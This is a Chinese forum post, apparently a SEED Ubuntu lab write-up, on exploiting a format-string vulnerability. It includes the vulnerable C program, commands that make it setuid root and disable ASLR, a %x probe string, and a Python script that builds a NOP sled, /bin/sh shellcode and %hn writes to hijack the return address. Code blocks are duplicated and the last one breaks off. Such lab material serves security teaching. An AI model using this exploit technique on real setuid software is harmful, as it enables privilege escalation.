-
-
[原创]seedubuntu格式化字符串漏洞实验
-
发表于: 2021-6-13 16:52
-
Ubuntu 16.04 LTS 32 位(SEED 1604)的 VMware 虚拟机。
在程序的第8行,把ebp寄存器的值放在变量framep中,后面会把该值打印出来,这个变量的目的是找到fmtstr()函数的返回地址存放的位置:ebp+4时返回地址的内存地址,此外,还打印了调用printf()函数前后该返回地址存放的内容,目的是看内容是否发生改变,如果没有说明攻击存在问题。
编写shell脚本,编译源程序,开启栈可执行;
更改目标程序的运行权限;
关闭地址随机化;
向badfile写入数据,定位str数组在栈中位置;
运行结果如下,可以看到0xaaaaaaaa.是在第17被打印出来的,因此前面需要16个%x才能到达第一个地址。
使用Python来构造攻击字符串:
运行python脚本后,执行源程序,最终效果:
#include <stdio.h>void fmtstr(char* str)
{ unsigned int *framep;
unsigned int *ret;
//copy ebp into framep
asm("movl %%ebp, %0" : "=r" (framep));
ret = framep + 1;
/* print out information for experiment purpose */
printf("The address of the input array: 0x%.8x\n", (unsigned)str);
printf("The value of the frame pointer: 0x%.8x\n", (unsigned)framep);
printf("The value of the return address(before): 0x%.8x\n", *ret);
printf(str);
printf("\nThe value of the return address(after): 0x%.8x\n", *ret);
}int main()
{ FILE *badfile;
char str[200];
badfile = fopen("badfile", "rb");
fread(str, sizeof(char), 200, badfile);
fmtstr(str);
return 1;
}#include <stdio.h>void fmtstr(char* str)
{ unsigned int *framep;
unsigned int *ret;
//copy ebp into framep
asm("movl %%ebp, %0" : "=r" (framep));
ret = framep + 1;
/* print out information for experiment purpose */
printf("The address of the input array: 0x%.8x\n", (unsigned)str);
printf("The value of the frame pointer: 0x%.8x\n", (unsigned)framep);
printf("The value of the return address(before): 0x%.8x\n", *ret);
printf(str);
printf("\nThe value of the return address(after): 0x%.8x\n", *ret);
}int main()
{ FILE *badfile;
char str[200];
badfile = fopen("badfile", "rb");
fread(str, sizeof(char), 200, badfile);
fmtstr(str);
return 1;
}gcc -z execstack -o p2 prog2.c
sudo chown root p2sudo chmod 4755 p2
sudo sysctl -w kernel.randomize_va_space=0
echo $(printf "\xaa\xaa\xaa\xaa@@@@\xbb\xbb\xbb\xbb")%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x > badfile
gcc -z execstack -o p2 prog2.c
sudo chown root p2sudo chmod 4755 p2
sudo sysctl -w kernel.randomize_va_space=0
echo $(printf "\xaa\xaa\xaa\xaa@@@@\xbb\xbb\xbb\xbb")%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x > badfile
#!/usr/bin/python3import sys
# This shellcode creates a local shelllocal_shellcode= (
"\x31\xc0\x31\xdb\xb0\xd5\xcd\x80"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x00"
).encode('latin-1')
N = 200
#The address of the input array: 0xbfffed04#The value of the frame pointer: 0xbfffece8#addr_array和frame_pointer根据上面的测试结果确定addr_array = 0xbfffed04 frame_pointer = 0xbfffece8
# Fill the content with NOP'scontent = bytearray(0x90 for i in range(N))
# Put the code at the endstart = N - len(local_shellcode)
content[start:] = local_shellcode
# Put the address at the beginningaddr1 = frame_pointer + 4 + 2
addr2 = frame_pointer + 4 #ret address
content[0:4] = (addr1).to_bytes(4,byteorder='little')
content[4:8] = ("@@@@").encode('latin-1')
content[8:12] = (addr2).to_bytes(4,byteorder='little')
# Calculate the value of CC = 16 - 1
# Construct the format stringaddr_array += 0x90 #shellcode offset
high = addr_array >> 16
low = addr_array % 0x10000
small = high - 12 - C*8
large = low - high
s = "%.8x"*C + "%." + str(small) + "x" + "%hn" \
+ "%." + str(large) + "x" + "%hn" + "\n"
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
# Write the content to badfilefile = open("badfile", "wb")
file.write(content)
file.close()
#!/usr/bin/python3import sys
# This shellcode creates a local shelllocal_shellcode= (
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
